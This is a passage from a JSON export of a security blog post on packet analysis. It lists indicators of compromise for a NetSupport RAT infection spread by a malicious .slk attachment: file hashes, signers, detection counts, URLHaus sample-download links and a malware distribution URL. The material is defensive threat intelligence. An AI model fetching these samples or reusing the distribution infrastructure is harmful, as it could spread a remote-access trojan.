\nHASH: 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18 COMMENT: msvcr100.dll
\nTYPE: Win32 DLL SIZE: 755.83 KB FILENAMES: msvcr100_clr0400.dll, msvcr100.dll, msvcr100_clr0400.dll, MSVCR100.dll
\nSIGNER: Microsoft Corporation; Microsoft Code Signing PCA; Microsoft Root Authority
\nFIRST: 2011-08-10 17:05:25 LAST: 2020-05-28 18:54:33 SUBMISSIONS: 12824 REPUTATION: 247
\nCOMMENTS: 10 USERS: tines_bot, joesecurity, HybridAnalysis, HybridAnalysis, HybridAnalysis, HybridAnalysis, ZXDemon, nielsgroeneveld, threatlead, Bernardo.Quintero TAGS: OVERLAY SIGNED TRUSTED VIA-TOR INVALID-SIGNATURE PEDLL
\nRESULT: 0 \/ 72
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\/<\/a>
\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:17 LAST_SEEN: 2019-09-27 18:51:26 URL_COUNT: 1
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/msvcr100.dll
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18<\/a><\/p>\n
10 \/ 19 > Suspicious
\nHASH: 9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917 COMMENT: pcicapi.dll
\nTYPE: Win32 DLL SIZE: 32.37 KB FILENAMES: pcicapi.dll, pcicapi.dll, pcicapi, pcicapi.xzi
\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign
\nFIRST: 2016-06-14 19:50:11 LAST: 2020-04-30 09:03:13 SUBMISSIONS: 18 REPUTATION: 0
\nCOMMENTS: 1 USERS: tines_bot TAGS: PEDLL SIGNED OVERLAY
\nRESULT: 1 \/ 70
\n[!] Signer – appeared 5 times in this batch b’NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign’
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917\/<\/a>
\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:18 LAST_SEEN: 2019-09-27 18:51:25 URL_COUNT: 1
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/pcicapi.dll
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/9074fd40ea6a0caa892e6361a6a4e834c2e51e6e98d1ffcda7a9a537594a6917<\/a><\/p>\n
11 \/ 19 > Unknown
\nHASH: c6b8ab9afb68f49a188765fe6bf2a71d2bbc6a53b4cd2d6cd0521f5df5e762a2 COMMENT: 1.exe
\nRESULT: – \/ –<\/p>\n
12 \/ 19 > Suspicious
\nHASH: 2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12 COMMENT: NSM.lic
\nVIRUS: ESET-NOD32: Win32\/RiskWare.RemoteAdmin.NetSupportManager.G
\nTYPE: Text SIZE: 257.0 B FILENAMES: NSM.lic, NSM.lic, NSM.LIC, nsm.lic, NSM.xyz
\nFIRST: 2019-08-16 19:05:10 LAST: 2020-04-23 03:48:02 SUBMISSIONS: 2 REPUTATION: 0
\nCOMMENTS: 1 USERS: tines_bot TAGS: TEXT
\nRESULT: 2 \/ 58
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/2050cc232710a2ea6a207bc78d1eac66a4042f2ee701cdfeee5de3ddcdc31d12<\/a><\/p>\n
13 \/ 19 > Clean
\nHASH: d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368 COMMENT: nskbfltr.inf
\nTYPE: Text SIZE: 328.0 B FILENAMES: nskbfltr.inf, nskbfltr.inf, nskbfltr.xzi, nskbfltr.xyz
\nFIRST: 2016-03-23 18:23:26 LAST: 2020-04-23 04:09:20 SUBMISSIONS: 6 REPUTATION: 0
\nCOMMENTS: 1 USERS: tines_bot TAGS: TEXT
\nRESULT: 0 \/ 57
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/d96856cd944a9f1587907cacef974c0248b7f4210f1689c1e6bcac5fed289368<\/a><\/p>\n
14 \/ 19 > Unknown
\nHASH: 2add4e3f9acd88b53c97989b309bccdf35456c444d7b4436bd0b9b04f1d16cf4 COMMENT: installations.ps1
\nRESULT: – \/ –<\/p>\n
15 \/ 19 > Suspicious
\nHASH: 053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae COMMENT: blowfish.dll
\nTYPE: Win32 DLL SIZE: 22.0 KB FILENAMES: blowfish.dll, blowfish.dll, qzojaagjazrin.dll, QZoJaagjazriN.dll, nLZQDl.dll, IVVdXtRTGXcOlhKois.dll, ivvdxtrtgxcolhkois.dll, YBpyzeWCZhYuiw.dll
\nFIRST: 2008-01-29 10:54:54 LAST: 2020-05-19 08:08:04 SUBMISSIONS: 359 REPUTATION: -25
\nCOMMENTS: 1 USERS: BugBopperGuy TAGS: PEDLL
\nRESULT: 1 \/ 71
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/053b4487d22aacf8274bab448ae1d665fe7926102197b47bfba6c7ed5493b3ae<\/a><\/p>\n
16 \/ 19 > Unknown
\nHASH: 5cd1dd897ca53631351db99484b62dd7f35c4a3539298638f4cfea42880c7ec7 COMMENT: files.cab
\nRESULT: – \/ –<\/p>\n
17 \/ 19 > Unknown
\nHASH: 9cf77e6862951486de61abe93ea66ceb21c807853480febb1cb0656970844be9 COMMENT: client32.ini
\nRESULT: – \/ –<\/p>\n
18 \/ 19 > Unknown
\nHASH: 9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f COMMENT: RPens.bat
\nRESULT: – \/ –
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/9f3cd0c5b9c3fd571e2da5b9feb9f05a7a969aeb77d3c54dfcc0d0226f3d5f9f<\/a><\/p>\n
19 \/ 19 > Suspicious
\nHASH: 313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a COMMENT: PCICHEK.DLL
\nTYPE: Win32 DLL SIZE: 18.37 KB FILENAMES: pcichek.dll, PCICHEK.DLL, pcichek.dll, pcichek, PCICHEK.xzi
\nSIGNER: NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign
\nFIRST: 2016-06-14 19:50:02 LAST: 2020-04-23 03:59:48 SUBMISSIONS: 22 REPUTATION: 0
\nCOMMENTS: 2 USERS: tines_bot, zbetcheckin TAGS: PEDLL SIGNED OVERLAY
\nRESULT: 1 \/ 70
\n[!] Signer – appeared 6 times in this batch b’NetSupport Ltd; Symantec Class 3 SHA256 Code Signing CA; VeriSign’
\n[!] Sample on URLHaus URL: http:\/\/urlhaus-api.abuse.ch\/v1\/download\/313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a\/<\/a>
\n[!] URLHaus info TYPE: exe FIRST_SEEN: 2019-09-22 19:44:07 LAST_SEEN: 2019-09-27 18:51:25 URL_COUNT: 1
\n[!] URLHaus STATUS: offline URL: http:\/\/xyxyxoooo.com\/KON998\/PCICHEK.DLL
\n[!] Sample on ANY.RUN URL: http:\/\/any.run\/report\/313117e723dda6ea3911faacd23f4405003fb651c73de8deff10b9eb5b4a058a<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"
Summary ======== Yesterday when reviewing the spam filters I found an email with a malicious attachment (.slk file) that setups the system to be infected with what looks to be a NetSupport RAT (based on the information found in the PCAP). I Checked the usual OSINT resources (ie: Hybrid Analysis, Malshare, MalwareBazaar, Anyrun, URLHaus, VT) for the hash of the attachment. Unfortunately there were no hits or results found. The initial link also had no hits yesterday either. The only hit from this malware was for the IP address 207.148.12.140 but that was in the forms of passive DNS results….<\/p>\n
 Continue reading<\/span><\/i><\/a> <\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[39,21],"class_list":["post-1364","post","type-post","status-publish","format-standard","hentry","category-packet-analysis","tag-netsupport","tag-rat"],"_links":{"self":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1364","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1364"}],"version-history":[{"count":11,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1364\/revisions"}],"predecessor-version":[{"id":1604,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=\/wp\/v2\/posts\/1364\/revisions\/1604"}],"wp:attachment":[{"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1364"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1364"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.herbiez.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1364"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}